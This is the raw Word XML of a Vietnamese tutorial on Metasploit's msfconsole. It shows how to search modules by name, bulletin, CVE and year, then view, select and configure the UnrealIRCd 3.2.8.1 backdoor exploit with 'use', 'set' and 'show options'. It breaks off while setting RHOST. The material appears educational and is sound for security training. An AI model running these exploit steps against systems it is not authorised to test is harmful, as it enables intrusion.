          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">help search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>để xem tất cả các tuỳ chọn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AEAD7" w14:textId="77777777" w:rsidR="003B3A36" w:rsidRDefault="003B3A36" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F019A5" w14:textId="61B54D3A" w:rsidR="003B3A36" w:rsidRDefault="00A379A5" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A379A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783B7E10" wp14:editId="7FA4F593">
            <wp:extent cx="5727700" cy="105092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050925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00901E07" w:rsidRPr="00901E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901E07" w:rsidRPr="00901E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B19B79" wp14:editId="2548C321">
            <wp:extent cx="5727700" cy="32181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18180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73729DBB" w14:textId="77777777" w:rsidR="00901E07" w:rsidRDefault="00901E07" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F19F97C" w14:textId="0B22092A" w:rsidR="00901E07" w:rsidRDefault="003467F9" w:rsidP="00536A5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Và nếu bạn muốn tìm kiếm theo tên, chỉ cần gõ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">search &lt;tên cần tìm&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vào msfconsole.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Dưới đây là một số các ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FB6BC" w14:textId="77777777" w:rsidR="003467F9" w:rsidRDefault="003467F9" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C652F2" w14:textId="7F5B8F8E" w:rsidR="003467F9" w:rsidRPr="003467F9" w:rsidRDefault="003467F9" w:rsidP="003467F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="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exploit cho lỗ hổng Microsoft’s </w:t>
      </w:r>
      <w:r w:rsidRPr="003467F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Security Bulletin MS13-069, thì ta chỉ cần lấy mã số để tìm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>search MS13-069</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DC0D4" w14:textId="77777777" w:rsidR="003467F9" w:rsidRDefault="003467F9" w:rsidP="003467F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769F353E" w14:textId="192E2DFA" w:rsidR="003467F9" w:rsidRDefault="00846099" w:rsidP="00846099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846099">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA6A218" wp14:editId="05D2D87B">
            <wp:extent cx="5727700" cy="1665605"/>
            <wp:effectExtent l="0" t="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665605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89FE06" w14:textId="77777777" w:rsidR="00846099" w:rsidRDefault="00846099" w:rsidP="00846099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE304E5" w14:textId="271D8DBE" w:rsidR="00846099" w:rsidRPr="00846099" w:rsidRDefault="00846099" w:rsidP="00846099">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:num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theo số CVE ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>search cve:2013-3660</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269BD74D" w14:textId="5B931498" w:rsidR="003467F9" w:rsidRDefault="003467F9" w:rsidP="00536A5A">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586C27C2" w14:textId="378E137D" w:rsidR="003467F9" w:rsidRDefault="00470955" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00470955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="608E6492" wp14:editId="421BA658">
            <wp:extent cx="5727700" cy="33578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357880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C965D2" w14:textId="77777777" w:rsidR="00470955" w:rsidRDefault="00470955" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E53F9AF" w14:textId="42312E0C" w:rsidR="00470955" w:rsidRPr="00C121D7" w:rsidRDefault="00C121D7" w:rsidP="00C121D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:num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tất cả các CVE ID thuộc năm nào đó: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>search cve:2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C061D1" w14:textId="77777777" w:rsidR="00C121D7" w:rsidRDefault="00C121D7" w:rsidP="00C121D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BD7E04" w14:textId="37D2018E" w:rsidR="00C121D7" w:rsidRDefault="00C121D7" w:rsidP="00C121D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C121D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E927B6E" wp14:editId="29C9B9EE">
            <wp:extent cx="5727700" cy="33274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32740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE97A8" w14:textId="77777777" w:rsidR="00C121D7" w:rsidRDefault="00C121D7" w:rsidP="00C121D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CDD4E2" w14:textId="029A5E2C" w:rsidR="00C121D7" w:rsidRPr="006865EE" w:rsidRDefault="00C121D7" w:rsidP="00C121D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:num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Tìm theo một chương trình cụ thể: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>search unreal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DDF7F1" w14:textId="77777777"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p>
    <w:p w14:paraId="0E9BE63B" w14:textId="192A735A"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r w:rsidRPr="006865EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C9810E0" wp14:editId="09D85D44">
            <wp:extent cx="5727700" cy="2174240"/>
            <wp:effectExtent l="0" t="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174240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E9D85" w14:textId="77777777"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p>
    <w:p w14:paraId="2BB3F337" w14:textId="3473212A" w:rsidR="006865EE" w:rsidRPr="006865EE" w:rsidRDefault="006865EE" w:rsidP="006865EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:num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Khi đã tìm được exploit và muốn xem thông tin về exploit đó thì dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>info: info exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D860CF" w14:textId="77777777" w:rsidR="006865EE" w:rsidRDefault="006865EE" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F7DD72" w14:textId="2673DD9D" w:rsidR="00290E30" w:rsidRDefault="00290E30" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290E30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C210932" wp14:editId="0FA07BC2">
            <wp:extent cx="5727700" cy="2512695"/>
            <wp:effectExtent l="0" t="0" r="1270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512695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FA4EEC" w:rsidRPr="00FA4EEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA4EEC" w:rsidRPr="00FA4EEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EED57A5" wp14:editId="13B91B07">
            <wp:extent cx="5727700" cy="299783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997835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E9DB4" w14:textId="77777777" w:rsidR="00FA4EEC" w:rsidRDefault="00FA4EEC" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4604EB24" w14:textId="6DC7697A" w:rsidR="00FA4EEC" w:rsidRDefault="00FD3E47"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Pr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông tin bao gồm tác giả, các tham số, giới thiệu và các trang ưeb thông tin về exploit đó. Nếu muốn sử dụng nó ta dùng lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16265BD8" w14:textId="77777777" w:rsidR="00FD3E47" w:rsidRDefault="00FD3E47" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E1DF2" w14:textId="7BA71028" w:rsidR="00FD3E47" w:rsidRDefault="00FD3E47"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ước 2: Thiết lập các tham số đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69E899" w14:textId="77777777" w:rsidR="00272F8D" w:rsidRDefault="00272F8D" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4A536E" w14:textId="18DC5414"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ể thiết lập một tham số cho exploit ta dùng lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">cấu trúc lệnh như sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set &lt;tham số&gt; &lt;giá trị&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50383F2C" w14:textId="77777777"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p>
    <w:p w14:paraId="5792359E" w14:textId="25C76956"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Nếu muốn xem lại các tham số nào cần thiết lập hoặc thiết lập gì ta gõ lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E20D617" w14:textId="77777777"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p>
    <w:p w14:paraId="7CC225FD" w14:textId="77777777" w:rsidR="00DF4360" w:rsidRPr="00DF4360" w:rsidRDefault="00DF4360" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D31490" w14:textId="78F99B8F"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DF4360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD1A5C7" wp14:editId="3856015B">
            <wp:extent cx="5727700" cy="2578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578100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="567ED673" w14:textId="77777777" w:rsidR="00DF4360" w:rsidRDefault="00DF4360" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56690A7F" w14:textId="004B1C96"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Như đã thấy, RHOST còn trống, để thiết lập giá trị cho nó ta dùng lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
